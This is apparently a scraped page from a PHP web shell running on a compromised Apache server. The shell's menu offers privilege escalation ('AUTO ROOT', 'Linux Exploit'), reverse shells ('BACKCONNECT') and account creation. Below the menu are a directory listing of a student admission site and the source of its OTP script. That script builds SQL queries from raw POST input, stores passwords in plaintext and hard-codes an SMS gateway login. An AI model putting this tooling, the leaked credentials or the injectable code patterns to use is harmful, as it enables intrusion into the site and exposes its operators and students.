Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.142.251.42
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
acu /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
36.29
KB
-rwxr-xr-x
MainPage_dev.html
36.76
KB
-rwxr-xr-x
admission_sms_push.php
2.3
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.45
KB
-rwxr-xr-x
cronjob_sendsms.php
2.5
KB
-rwxr-xr-x
database.php
396
B
-rwxr-xr-x
direct-signin.php
886
B
-rw-rw-r--
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
4.84
KB
-rwxr-xr-x
index.html
5.01
KB
-rwxr-xr-x
index_1.html
130
B
-rwxr-xr-x
instruction.html
9.53
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
4.45
KB
-rwxr-xr-x
login.php
294
B
-rwxr-xr-x
resetpassword.php
697
B
-rwxr-xr-x
sendGridMail.php
1.28
KB
-rwxr-xr-x
sendMobEmailOTP.php
1.4
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
sign-up.html
7.29
KB
-rwxr-xr-x
signin.php
973
B
-rwxr-xr-x
signup.php
1.22
KB
-rwxr-xr-x
support.html
4.76
KB
-rwxr-xr-x
upload.php
415
B
-rwxr-xr-x
upload1.php
423
B
-rwxr-xr-x
upload_file.php
523
B
-rwxr-xr-x
validateRegno.php
2.35
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sendMobEmailOTP.php
<?php include ("database.php"); ini_set('display_errors', 'on'); include("sendsmsapi.php"); $mobile = trim($_POST['mobile']); $dob = trim($_POST['dob']);//password $passwd = trim($_POST['password']); $query = "select ifnull(fmobileotp,'') as fmobileotp from masstud where fmobileno = '{$mobile}' and ROUND(time_to_sec((TIMEDIFF(NOW(), fmobotptime))) / 60) <= 5"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); date_default_timezone_set('Asia/Kolkata'); $time = date("h:i A"); if($count > 0) { $row = mysqli_fetch_assoc($result); $motpaswrd = $row['fmobileotp']; $smsotp = "Dear Student, Your mobile OTP for Registration is, {$motpaswrd} sent at {$time}"; } else { $motpaswrd = rand(1000, 9000); //strtoupper(substr(sha1(rand()), 0, 4)); $smsotp = "Dear Student, Your mobile OTP for Registration is {$motpaswrd} sent at {$time}"; } $username = 'logisyhttp'; $password = 'Logis986'; $from = 'UNISOL'; $to = $mobile; $text = $smsotp; $category = ''; $smsresp = sendsmaapi($username,$password,$from,$to,$text,$category); $arr["sms"] = $smsresp; $query = "update masstud set fmobileotp = '{$motpaswrd}', fmobotptime = now(), fdob = '{$dob}', fpasswd ='{$passwd}',fotpcounter = fotpcounter+1 where fmobileno = '{$mobile}'"; if(mysqli_query($conn,$query)) { $arr["status"] = 'success'; } else { $arr["status"] = 'error'; } //$arr["email"] = $data['message']; echo json_encode($arr); ?>
Close